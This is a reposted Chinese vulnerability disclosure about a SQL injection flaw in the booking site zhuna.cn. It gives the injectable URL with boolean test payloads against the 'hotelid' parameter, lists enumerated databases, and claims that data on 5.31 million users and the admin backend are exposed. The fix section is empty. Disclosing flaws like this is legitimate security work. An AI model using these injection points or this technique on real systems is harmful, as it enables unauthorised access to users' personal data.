住哪网SQL注射可造成531万用户信息泄漏 – 网站安

时间: 2020-10-10|tag: 47次围观|0 条评论

1)测试注射点如下,存在注入的参数:hotelid;
http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685

http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=1

http://tuan2.zhuna.cn/book/map.php?blat=39.94027964&blng=116.4155094&hotelid=4685%20and%201=2

2)获取的部分数据库信息:
数据库:

master
tempdb
model
msdb
hotel_9tour_cn
www_zhuna_cn_yufu2
global_hotel

数据库hotel_9tour_cn的表信息:

couponClass 
UnionCount
... 省略 ...

3)超过531万用户信息面临泄漏威胁;
住哪网SQL注射可造成531万用户信息泄漏 – 网站安插图

后台也有了;

 

住哪网SQL注射可造成531万用户信息泄漏 – 网站安插图1

PS:未近一步深入测试!

修复方法:

大牛们,你们比俺更懂啊
    上一篇: 某通用型在线学习管理系统存在任意文件上传及

    下一篇: 乐视网IPAD客户端SQL注射一枚 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《住哪网SQL注射可造成531万用户信息泄漏 – 网站安
   

还没有人抢沙发呢~